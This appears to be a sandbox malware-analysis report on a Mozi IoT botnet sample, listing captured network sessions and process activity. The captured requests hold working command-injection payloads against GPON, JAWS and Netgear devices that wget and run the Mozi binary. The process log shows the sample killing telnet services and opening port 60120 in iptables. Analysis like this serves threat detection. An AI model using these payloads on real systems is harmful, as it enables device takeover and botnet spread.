                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 20 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 32 33 2e 32 35 34 2e 36 34 2e 38 38 2f 48 4e 41 50 31 2f 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 73 6d 30 30 31 2e 70 72 6f 78 2e 6d 69 63 72 6f 6c 65 61 76 65 73 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 31 2f 30 32 2f 30 36 20 30 35 3a 33 35 3a 35 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 30 2e 30 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><h1>500 Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://23.254.64.88/HNAP1/</td></tr><tr><td>Server:</td><td>sm001.prox.microleaves.com</td></tr><tr><td>Date:</td><td>2021/02/06 05:35:58</td></tr></table><hr/>Powered by Tengine/2.0.0</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  4192.168.2.2046030203.46.145.7780
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:20.104547977 CET419OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:36:20.451877117 CET419INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:20 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 315
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  5192.168.2.204939823.217.12.20880
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:26.938760042 CET452OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.217.12.208:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:27.137348890 CET452INHTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 207
                                                                                                                  Expires: Sat, 06 Feb 2021 10:36:27 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:27 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 64 38 64 32 31 37 26 23 34 36 3b 31 36 31 32 36 30 37 37 38 37 26 23 34 36 3b 33 35 39 30 34 64 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;fd8d217&#46;1612607787&#46;35904d6</BODY></HTML>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  6192.168.2.2051358172.67.201.11980
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:29.769190073 CET471OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:36:29.815510035 CET472INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:29 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 155
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 61d43afe49454c79-AMS
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  7192.168.2.203282847.246.22.23080
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:33.860372066 CET485OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 47.246.22.230:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:33.991323948 CET486INHTTP/1.1 403 Forbidden
                                                                                                                  Server: Tengine
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:33 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 254
                                                                                                                  Connection: keep-alive
                                                                                                                  Via: cache4.us13[,0]
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body bgcolor="white"><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  8192.168.2.2060698159.140.205.21480
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:33.911283970 CET486OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 159.140.205.214:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  9192.168.2.206019824.239.192.3880
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:36:47.936842918 CET552OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 24.239.192.38:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:48.084233999 CET555INHTTP/1.0 404 Not Found
                                                                                                                  Server: SonicWALL
                                                                                                                  Expires: -1
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-type: text/html;charset=UTF-8
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 68 74 74 70 3a 26 23 78 32 46 3b 26 23 78 32 46 3b 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 26 23 78 32 46 3b 4d 6f 7a 69 2e 61 3b 63 68 6d 6f 64 20 37 37 37 20 4d 6f 7a 69 2e 61 3b 26 23 78 32 46 3b 74 6d 70 26 23 78 32 46 3b 4d 6f 7a 69 2e 61 20 6a 61 77 73 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget http:&#x2F;&#x2F;192.168.1.1:8088&#x2F;Mozi.a;chmod 777 Mozi.a;&#x2F;tmp&#x2F;Mozi.a jaws</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:/usr/bin/qemu-arm /tmp/mozi.a.zip
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/usr/bin/killall
                                                                                                                  Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                  File size:23736 bytes
                                                                                                                  MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:11
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:n/a
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/modprobe
                                                                                                                  Arguments:/sbin/modprobe ip_tables
                                                                                                                  File size:9 bytes
                                                                                                                  MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/sbin/iptables
                                                                                                                  Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
                                                                                                                  File size:13 bytes
                                                                                                                  MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/tmp/mozi.a.zip
                                                                                                                  Arguments:n/a
                                                                                                                  File size:307960 bytes
                                                                                                                  MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
                                                                                                                  Path:/bin/sh
                                                                                                                  Arguments:n/a
                                                                                                                  File size:4 bytes
                                                                                                                  MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                  General

                                                                                                                  Start time:11:35:26
                                                                                                                  Start date:06/02/2021
